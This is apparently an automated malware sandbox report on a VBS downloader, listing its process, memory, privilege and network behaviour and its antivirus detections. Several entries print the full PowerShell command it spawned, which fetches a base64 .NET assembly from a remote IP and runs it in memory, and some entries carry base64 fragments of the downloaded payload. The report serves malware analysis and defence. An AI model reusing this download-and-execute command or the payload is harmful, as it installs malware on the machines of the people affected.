NtAllocateVirtualMemory May 9, 2023, 6:25 p.m.	process_identifier: 2256 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04f23000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2023, 6:25 p.m.	process_identifier: 2256 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04f24000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (3 events)

cmdline	C:\Windows\System32\cmd.exe /c powershell.exe [Byte[]] $rOWg = [system.Convert]::FromBase64string((New-Object Net.WebClient).DownloadString('http://172.174.176.153/dll/new_rump_vb.net.txt'));[System.AppDomain]::CurrentDomain.Load($rOWg).GetType('Fiber.Home').GetMethod('VAI').Invoke($null, [object[]] ('ø☀☞√�}П�◀@+@░�@@ø☀☞√�}П�.!}(ú░}nmz◀@+@░�@@(+ø(!}(ú░}mz◀@+@░�@@(+ø(!}(ú░}zmn◀@+@░�@@v(+ø(n4●☞#:▶4(úø(@@ú.0(úø(@@ú](∞ú(.87](∞ú(.59](∞ú(4●☞#:▶4●☞#:▶▶☟ð}↓→+◀pø☀☞√�}П�ø☀☞√�}П�↓(▲☟@*⇝','1No1me_Startup','2No3me_3tartup'))
cmdline	"C:\Windows\system32\cmd.exe" /c powershell.exe [Byte[]] $rOWg = [system.Convert]::FromBase64string((New-Object Net.WebClient).DownloadString('http://172.174.176.153/dll/new_rump_vb.net.txt'));[System.AppDomain]::CurrentDomain.Load($rOWg).GetType('Fiber.Home').GetMethod('VAI').Invoke($null, [object[]] ('ø☀☞√�}П�◀@+@░�@@ø☀☞√�}П�.!}(ú░}nmz◀@+@░�@@(+ø(!}(ú░}mz◀@+@░�@@(+ø(!}(ú░}zmn◀@+@░�@@v(+ø(n4●☞#:▶4(úø(@@ú.0(úø(@@ú](∞ú(.87](∞ú(.59](∞ú(4●☞#:▶4●☞#:▶▶☟ð}↓→+◀pø☀☞√�}П�ø☀☞√�}П�↓(▲☟@*⇝','1No1me_Startup','2No3me_3tartup'))
cmdline	powershell.exe [Byte[]] $rOWg = [system.Convert]::FromBase64string((New-Object Net.WebClient).DownloadString('http://172.174.176.153/dll/new_rump_vb.net.txt'));[System.AppDomain]::CurrentDomain.Load($rOWg).GetType('Fiber.Home').GetMethod('VAI').Invoke($null, [object[]] ('ø☀☞√�}П�◀@+@░�@@ø☀☞√�}П�.!}(ú░}nmz◀@+@░�@@(+ø(!}(ú░}mz◀@+@░�@@(+ø(!}(ú░}zmn◀@+@░�@@v(+ø(n4●☞#:▶4(úø(@@ú.0(úø(@@ú](∞ú(.87](∞ú(.59](∞ú(4●☞#:▶4●☞#:▶▶☟ð}↓→+◀pø☀☞√�}П�ø☀☞√�}П�↓(▲☟@*⇝','1No1me_Startup','2No3me_3tartup'))

A process created a hidden window (1 event)

Time & API	Arguments	Status	Return	Repeated
ShellExecuteExW May 9, 2023, 6:25 p.m.	show_type: 0 filepath_r: C:\Windows\system32\cmd.exe parameters: /c powershell.exe [Byte[]] $rOWg = [system.Convert]::FromBase64string((New-Object Net.WebClient).DownloadString('http://172.174.176.153/dll/new_rump_vb.net.txt'));[System.AppDomain]::CurrentDomain.Load($rOWg).GetType('Fiber.Home').GetMethod('VAI').Invoke($null, [object[]] ('ø☀☞√�}П�◀@+@░�@@ø☀☞√�}П�.!}(ú░}nmz◀@+@░�@@(+ø(!}(ú░}mz◀@+@░�@@(+ø(!}(ú░}zmn◀@+@░�@@v(+ø(n4●☞#:▶4(úø(@@ú.0(úø(@@ú](∞ú(.87](∞ú(.59](∞ú(4●☞#:▶4●☞#:▶▶☟ð}↓→+◀pø☀☞√�}П�ø☀☞√�}П�↓(▲☟@*⇝','1No1me_Startup','2No3me_3tartup')) filepath: C:\Windows\System32\cmd.exe	1	1	0

File has been identified by 5 AntiVirus engines on VirusTotal as malicious (5 events)

Cyren	URL/Downldr.CU.gen!Eldorado
Kaspersky	HEUR:Trojan-Downloader.VBS.SLoad.gen
ZoneAlarm	HEUR:Trojan-Downloader.VBS.SLoad.gen
Google	Detected
McAfee	VBS/Downloader.acb

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses May 9, 2023, 6:25 p.m.	flags: 15 family: 0		111	0

URL downloaded by powershell script (5 events)

Data received	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oAAAASAAAAKgAAABIAAAAqAAAAEgAAACoAAAATMAMABAAAAAAAAAAAABcqEzADAAQAAAAAAAAAAAAUKhMwAwAEAAAAAAAAAAAAFCoTMAMAoQAAAAEAABEoBD8ABiACAAAA/g4AADgAAAAA/gwAAEUFAAAAFAAAAAUAAAAVAAAASAAAADkAAAA4DwAAACj/AwAGIAQAAAA40////yoo/gMABiAAAAAAftQTAAR7zRMABDq5////JiABAAAAOK7///8oBkAABiADAAAAOJ////8oAAQABoCdAQAEIAAAAAB+1BMABHvNEwAEOoH///8mIAAAAAA4dv///wAAACIAFKVBAAACKgAAABIAABcqAAAAEgAAFCoAAAASAAAUKgAAABIAAAAqAAAAEgAAACoAAAASAAAXKgAAABMwAwAEAAAAAAAAAAAAACoTMAMABAAAAAAAAAAAAAAqEzAEAAQAAAAAAAAAAAAAKhIAABYqAAAAEgAAFioAAAASAAAWKgAAABIAFmoqAAAAEgAWayoAAAASABZsKgAAABIAABQqAAAAEgAAFCoAAAATMAMABAAAAAAAAAAAABcqEzADALYAAAABAAARKAQ/AAYgAQAAAP4OAAA4AAAAAP4MAABFBQAAACkAAAAFAAAAXAAAAF0AAABNAAAAOCQAAAAoEAQABiAAAAAAftQTAAR7lRMABDrJ////JiAAAAAAOL7///8oEQQABiAEAAAAftQTAAR7uhMABDql////JiACAAAAOJr///8oEgQABiADAAAAOIv///8qcwEEAAaAnwEABCACAAAAftQTAAR72hMABDls////JiACAAAAOGH///8AABIAABcqAAAAEgAAFCoAAAASAAAAKgAAABIAAAAqAAAAEgAAACoAAAAiABSlWgAAAioAAAAiABSlWgAAAioAAAAuKAQ/AAYoGAQABioSAAAXKgAAABIAABQqAAAAEgAAACoAAAAiABSlWgAAAioAAAAiABSlWgAAAioAAAATMAMABAAAAAAAAAAAAAAqEzAEAAQAAAAAAAAAAAAAKhMwAwAEAAAAAAAAAA
Data received	ACJRYanCUXHpxz4DcABoBQDgAEIAQAAAA4Kf3//xgZjUkDAAIl0EITAAR+IBUABCiiRAAGc+A3AAaAUQ4ABCARAAAAOP78//8bHxuNSQMAAiXQSxMABH4gFQAEKKJEAAZz4DcABoBaDgAEIAoAAAB+1BMABHudEwAEOs
Data received	EoBD8ABiADAAAA/g4AADgAAAAA/gwAAEUFAAAAcAAAABQAAABhAAAABQAAAD0AAAA4awAAACjFHwAGIAIAAAA40////3PBHwAGgLMHAAQgAAAAAH7UEwAEe5MTAAQ6tf///yYgAAAAADiq////KMcfAAYgAQAAAH7UEw
Data received	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
Data received	DMRwAAAAABAJ9XAAAAAAEAzEcAAAAAAQDMRwAAAAACAKZXAAAAAAEA3lcAAAAAAQCGWAAAAAABAEZWAAAAAAEAEE4AAAAAAgCfWQAAAAADAKdZAAAAAAEAEE4AAAAAAgBGVgAAAAADAJ9ZAAAAAAQAp1kAAAAAAQDMRwAAAAABAMxHAAAAAAIAzEcAAAAAAQDMRwAAAAABAMxHAAAAAAIA9lkAAAAAAQDMRwAAAAACAMxHAAAAAAEAzEcAAAAAAQDMRwAAAAACAMxHAAAAAAEAzEcAAAAAAgDMRwAAAAABAMxHAAAAAAIAzEcAAAAAAQDMRwAAAAABAMxHAAAAAAEAjFoAAAAAAQDMRwAAAAABAMxHAAAAAAIAzEcAAAAAAQDMRwAAAAABAIlQAAAAAAIAm2EAAAAAAQCJUAAAAAACAJthAAAAAAEAiVAAAAAAAgCbYQAAAAABAMxHAAAAAAEAiVAAAAAAAgCbYQAAAAABAMxHAAAAAAEAiVAAAAAAAgCbYQAAAAABAMxHAAAAAAIAzEcAAAAAAQDMRwAAAAABAIlQAAAAAAIA0mUAAAAAAwCbYQAAAAABAMxHAAAAAAEAiVAAAAAAAgDSZQAAAAADAJthAAAAAAEAzEcAAAAAAQCJUAAAAAACAJthAAAAAAEAzEcAAAAAAQAJTgAAAAABAGpUAAAAAAEA0k0AAAAAAQAJTgAAAAABAAlOAAAAAAIAEE4AAAAAAQBqVAAAAAABAGpUAAAAAAIAEE4AAAAAAQD7aQAAAAACAKBSAAAAAAMA8k0AAAAABAClUgAAAAABAMxHAAAAAAIAzEcAAAAAAwDMRwAAAAABAMxHAAAAAAIAzEcAAAAAAwDMRwAAAAAEAMxHAAAAAAEAzEcAAAAAAQBqVAAAAAACAB1qAAAAAAEAalQAAAAAAgAdagAAAAABAMxHAAAAAAIAzEcAAAAAAwDMRwAAAAABAMxHAAAAAAIAzEcAAAAAAQDMRwAAAAACAMxHAAAAAAEAlGwAAAAAAQCUbAAAAAABAJRsAAAAAAEAlGwAAAAAAQCUbAAAAAABANJNAAAAAAEA900AAAAAAgALbQAAAAADAJthAAAAAAEAzEcAAAAAAQAzbQAAAAACADxtAAAAAAMAm2EAAAAAAQAzbQAAAAACAJthAAAAAAEAM20AAAAAAQArTAAAAAACADNtAAAAAAMAC20AAAAABACbYQAAAAABACtMAAAAAAIAC20AAAAAAwCbYQAAAAABACtMAAAAAAIAm2EAAAAAAQArTAAAAAACADNtAAAAAAMAm2EAAAAAAQArTAAAAAABACtMAAAAAAIAM20AAAAAAQBHbQAAAAACABBOAAAAAAMAC20AAAAABACbYQAAAAABAEdtAAAAAAIAEE4AAAAAAwCbYQAAAAABAEdtAAAAAAIAEE4AAAAAAQBHbQAAAAACAAttAAAAAAMAm2EAAAAAAQBHbQAAAAACAJthAAAAAAEAR20AAAAAAQAJTgAAAAABAGpUAAAAAAEACU4AAAAAAQAJTgAAAAACABBOAAAAAAEAalQAAAAAAQBqVAAAAAACABBOAAAAAAEAzEcAAAAAAQDMRwAAAAACAMxHAAAAAAMAzEcAAAAAAwDMRwAAAAACAAlOAAAAAAMAEE4AAAAAAQDMRwAAAAACAMxHAAAAAAEAzEcAAAAAAgDMRwAAAAACAMxHAAAAAAIAzEcAAAAAAQDMRwAAAAACAMxHAAAAAAEAzEcAAAAAAgDMRwAAAAABAMxHAAAAAAIAzEcAAAAAAQDMRwAAAAABAMxHAAAAAAEAzEcAAAAAAQDMRwAAAAABAMxHAAAAAAIAzEcAAAAAAQDMRwAAAAABAMxHAAAAAAIAzEcAAAIAAQDMRwAAAAABAMxHAAACAAIAzEcAAAAAAQDMRwAAAgABAMxHAAACAAEAzEcAAAAAAQDMRwAAAAABAMxHAAAAAAIAzEcAAAAAAwDMRwAAAAABAMxHAAAAAAIAzEcAAAAAAwDMRwAAAAAEAMxHAAAAAAEAzEcAAAAAAQDMRwAAAAABAMxHAAAAAAEAzEcAAAAAAQDMRwAAAAABAMxHAAAAAAEAzEcAAAAAAgDMRwAAAAABAMxHAAAAAAIAzEcAAAAAAwDMRwAAAAABAMxHAAAAAAIAzEcAAAAAAwDMRwAAAgAEAMxHAAAAAAEAzEcAAAAAAQDMRwAAAAACAMxHAAAAAAMAzEcAAAAAAQDMRwAAAAACAMxHAAAAAAMAzEcAAAAABADMRwAAAAABAMxHAAAAAAEAzEcAAAAAAQDMRwAAAAABAMxHAAAAAAEAzEcAAAAAAQDMRwAAAAABAMxHAAAAAAIAzEcAAAAAAQDMRwAAAAACAMxHAAAAAAMAzEcAAAAAAQDMRwAAAAACAMxHAAAAAAMAzEcAAAIABADMRwAAAAABACtMAAAAAAIAM20AAAAAAQArTAAAAAACADNtAAAAAAEAK0wAAAAAAQAJTgAAAAACABBOAAAAAAEA+HIAAAAAAQAAcwAAAAACAJ9ZAAAAAAEA0k0AAAAAAQDSTQAAAAABAK1zAAAAAAIACU4AAAAAAwAQTgAAAAABAMxHAAAAAAEAzEcAAAAAAQDMRwAAAAABANhzAAAAAAIAEE4AAAAAAQDYcwAAAAABANhzAAAAAAIAEE4AAAAAAQDYcwAAAAABABBOAAAAAAEAEE4AAAAAAQBPdAAAAAABAFV0AAAAAAIAEE4AAAAAAQBVdAAAAAACAGF0AAAAAAMAEE4AAAAAAQAQTgAAAgABANJNAAACAAEA0k0AAAAAAQAKdQAAAAABANJNAAAAAAEACnUAAAAAAQCLdQAAAAABAIt1AAAAAAIACnUAAAAAAQBVdAAAAAABAFV0AAAAAAIAo3UAAAAAAQBVdAAAAAABAFV0AAAAAAIAo3UAAAAAAQBVdAAAAAABAFV0AAAAAAIAo3UAAAAAAQDMRwAAAAACAAlOAAAAAAIACU4AAAAAAgAJTgAAAAACAAlOAAAAAAIACU4AAAAAAgAJTgAAAAACAAlOAAAAAAMAT3QAAAAAAgAJTgAAAAAEABBOAAAAAAIACU4AAAAABABhdAAAAAAFABBOAAAAAAIACU4AAAAAAwAQTgAAAAABAAlOAAAAAAIAEE4AAAAAAQDMRwAAAAABAMxHAAAAAAIAzEcAAAAAAQAJTgAAAAACABBOAAAAAAEACU4AAAAAAgAQTgAAAAABAAlOAAAAAAIAEE4AAAAAAQCtcwAAAAACAAlOAAAAAAMAEE4AAAAAAQDSTQAAAAABANJNAAAAAAIACU4AAAAAAwAQTgAAAAABAMxHAAAAAAEAzEcAAAAAAgDMRwAAAAABAMxHAAAAAAIAzEcAAAAAAgDMRwAAAAACAMxHAAAAAAIAzEcAAAAAAQDMRwAAAQABAIlQAAAAAAEAzEcAAAAAAgDMRwAAAAABAMxHAA

Poweshell is sending data to a remote host (1 event)

Data sent

GET /dll/new_rump_vb.net.txt HTTP/1.1 Host: 172.174.176.153 Connection: Keep-Alive

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW May 9, 2023, 6:25 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Communicates with host for which no DNS query was performed (1 event)

host

172.174.176.153

Network communications indicative of a potential document or script payload download was initiated by the process powershell.exe (1 event)

Time & API	Arguments	Status	Return	Repeated
send May 9, 2023, 6:25 p.m.	buffer: GET /dll/new_rump_vb.net.txt HTTP/1.1 Host: 172.174.176.153 Connection: Keep-Alive socket: 1420 sent: 88	1	88	0

One or more non-whitelisted processes were created (2 events)

parent_process	wscript.exe				martian_process	C:\Windows\System32\cmd.exe /c powershell.exe [Byte[]] $rOWg = [system.Convert]::FromBase64string((New-Object Net.WebClient).DownloadString('http://172.174.176.153/dll/new_rump_vb.net.txt'));[System.AppDomain]::CurrentDomain.Load($rOWg).GetType('Fiber.Home').GetMethod('VAI').Invoke($null, [object[]] ('ø☀☞√�}П�◀@+@░�@@ø☀☞√�}П�.!}(ú░}nmz◀@+@░�@@(+ø(!}(ú░}mz◀@+@░�@@(+ø(!}(ú░}zmn◀@+@░�@@v(+ø(n4●☞#:▶4(úø(@@ú.0(úø(@@ú](∞ú(.87](∞ú(.59](∞ú(4●☞#:▶4●☞#:▶▶☟ð}↓→+◀pø☀☞√�}П�ø☀☞√�}П�↓(▲☟@*⇝','1No1me_Startup','2No3me_3tartup'))
parent_process	wscript.exe				martian_process	"C:\Windows\system32\cmd.exe" /c powershell.exe [Byte[]] $rOWg = [system.Convert]::FromBase64string((New-Object Net.WebClient).DownloadString('http://172.174.176.153/dll/new_rump_vb.net.txt'));[System.AppDomain]::CurrentDomain.Load($rOWg).GetType('Fiber.Home').GetMethod('VAI').Invoke($null, [object[]] ('ø☀☞√�}П�◀@+@░�@@ø☀☞√�}П�.!}(ú░}nmz◀@+@░�@@(+ø(!}(ú░}mz◀@+@░�@@(+ø(!}(ú░}zmn◀@+@░�@@v(+ø(n4●☞#:▶4(úø(@@ú.0(úø(@@ú](∞ú(.87](∞ú(.59](∞ú(4●☞#:▶4●☞#:▶▶☟ð}↓→+◀pø☀☞√�}П�ø☀☞√�}П�↓(▲☟@*⇝','1No1me_Startup','2No3me_3tartup'))

The process wscript.exe wrote an executable file to disk which it then attempted to execute (1 event)

file	C:\Windows\System32\cmd.exe

droidddxxxPayload.vbs

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All